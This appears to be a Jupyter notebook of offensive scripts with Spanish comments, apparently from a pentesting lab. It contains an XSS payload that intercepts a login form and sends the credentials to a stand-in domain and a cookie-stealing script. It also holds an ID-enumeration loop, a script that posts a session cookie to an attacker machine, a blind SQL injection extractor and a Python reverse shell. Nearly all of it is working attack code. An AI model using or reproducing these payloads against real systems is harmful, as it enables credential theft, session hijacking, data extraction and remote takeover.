In [ ]:
<div> <script>
  document.addEventListener('DOMContentLoaded', function() {
    var form = document.forms[0];
    form.addEventListener('submit', function(event) {
      event.preventDefault();
      var user = form.elements['user'].value;
      var pass = form.elements['password'].value;
      var xhr = new XMLHttpRequest();
      xhr.open('GET', 'http://tu_dominio.com/robar_credenciales.php?user=' + user + '&pass=' + pass, true);
      xhr.send();
    });
  });
</script><div>

In [ ]:
//robo de cookies
<div>
  <script>
    // Función para enviar las cookies a un servidor controlado por ti
    function sendCookies(cookies) {
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "http://tu-servidor.com/captura?cookies=" + encodeURIComponent(cookies), true);
      xhr.send();
    }

    // Llama a la función con las cookies actuales
    sendCookies(document.cookie);
  </script>
<div>

In [ ]:
                                                            
import requests

# Definir la URL base
base_url = "http://10.0.2.20/post.php?id="

# Definir el rango de IDs a verificar
id_range = range(1, 101)

# Recorrer el rango de IDs
for post_id in id_range:
    # Construir la URL completa
    url = f"{base_url}{post_id}"
    
    # Enviar la solicitud HTTP
    response = requests.get(url)
    
    # Verificar el código de estado de la respuesta
    if response.status_code == 200:
        print(f"ID {post_id} está disponible: {url}")
    else:
        print(f"ID {post_id} no está disponible: {url}")


In [ ]:
#script para que envie la cookie a tu servidor
import requests

# Recopilar la cookie
cookie = request.cookies.get('session')

# Enviar la cookie a tu Kali Linux
url = 'http://10.0.2.25:1234/cookie.py'
data = {'cookie': cookie}

response = requests.post(url, data=data)

# Mostrar el resultado
print(response.text)

In [ ]:
#script sqli a ciegas
import requests

url_base = "http://10.0.2.21/admin/edit.php?id=1 AND SUBSTRING((SELECT {field} FROM {table} WHERE {condition} LIMIT 1 OFFSET {offset}), {pos}, 1) = '{char}'--"
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
extracted = ""

def extract_data(field, table, condition, offset):
    global extracted
    for pos in range(1, 21):  # Asume que el nombre tiene un máximo de 20 caracteres
        found = False
        for char in chars:
            url = url_base.format(field=field, table=table, condition=condition, offset=offset, pos=pos, char=char)
            response = requests.get(url)
            print(f"Testing URL: {url}")  # Depuración
            print(f"Response: {response.text}")  # Depuración
            if "expected output" in response.text:  # Cambia esto según el comportamiento esperado
                extracted += char
                print(f"Encontrado carácter {pos}: {char}")
                found = True
                break
        if not found:
            break
    print(f"Extracted: {extracted}")

# Extraer nombres de tablas
extracted = ""
extract_data("table_name", "information_schema.tables", "table_schema='blog'", 0)
print(f"Nombre de la tabla: {extracted}")

# Reiniciar para extraer columnas de la tabla obtenida
extracted = ""
extract_data("column_name", "information_schema.columns", "table_name='comments'", 0)
print(f"Nombre de la columna: {extracted}")



In [ ]:
import socket
import subprocess
import os

# Configuración para la conexión reverse
RHOST = '10.0.2.19'  # Tu IP (listener)
RPORT = 4444          # Puerto de escucha

def connect_back():
    try:
        # Crear un socket  usando af_inet y sock_stream para la conexión TCP al servidor
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((RHOST, RPORT))

        # con dup2 redireccionamos la salida estandar a un socket y con fileno() se obtiene el descriptor de archivo
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)

        # Iniciar una shell con acceso root
        subprocess.call(['/bin/sh', '-i'])

    except Exception as e:
        # Si ocurre un error, cierra el socket
        print(f"Error occurred: {e}")
        s.close()

if __name__ == '__main__':
    connect_back()
